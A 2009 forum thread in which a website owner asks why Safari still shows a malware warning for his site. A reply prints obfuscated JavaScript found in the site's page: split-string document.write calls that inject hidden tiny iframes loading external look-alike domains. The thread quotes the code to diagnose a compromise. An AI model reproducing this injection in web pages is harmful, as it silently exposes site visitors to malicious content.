Malware message from Safari on my website (Safari only)

Discussion in 'macOS' started by bgallim105, Jul 13, 2009.

1. bgallim105 macrumors newbie

Hey guys, This is my first post, thanks in advance for any help. Hope I can explain correctly.
    I don't think my site www.trolleze.com actually ever had malware. I (not knowing better) placed a small *.exe file on my site via ftp just to transfer it from home to work. Anyway I think it caused me to get listed with google as having malware etc. (even though it was no type of dangerous file). I registered with googles webmaster tools, deleted it off my site and requested they re-scan it. Well that seams to have worked and all is fine except with Safari. I am still getting the malware notice with Safari only. I have cleared history, emptied the cache, deleted cookies and reset safari. Still getting the message. Sometimes I can open the site fine then click home and it pops up again. I really think my site is completely fine but I cant figure out why its still doing this with Safari. Needless to say this is terrible for business. Any advise will be greatly appreciated.
    Brian

2. OutThere macrumors 603

OutThere

3. jamesarm97 macrumors 65816

This is a part of the code on your website. Should edit and remove it from your site asap:

<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.write("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.writed("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.write("<i"+'fr'+"am"+'e s'+"rc=\""+'htt'+"p:"+''+"//"+'trug'+"hts"+''+'a.c'+"o"+'m/'+"\" wid"+'th=2 he'+"igh"+'t'+"="+"1></i"+"fra"+''+"m"+''+"e"+'>');</script><script>document.write("<i"+"fr"+"a"+"me s"+"rc=\"h"+"tt"+"p"+":"+"/"+"/tru"+"ght"+""+"sa.c"+"o"+"m"+"/\" wid"+"th=1 he"+"ight"+"="+"2></i"+"fra"+""+"m"+""+"e>");</script>

4. bgallim105 thread starter macrumors newbie

Wow, thanks. May be a stupid question but how can this get on my site?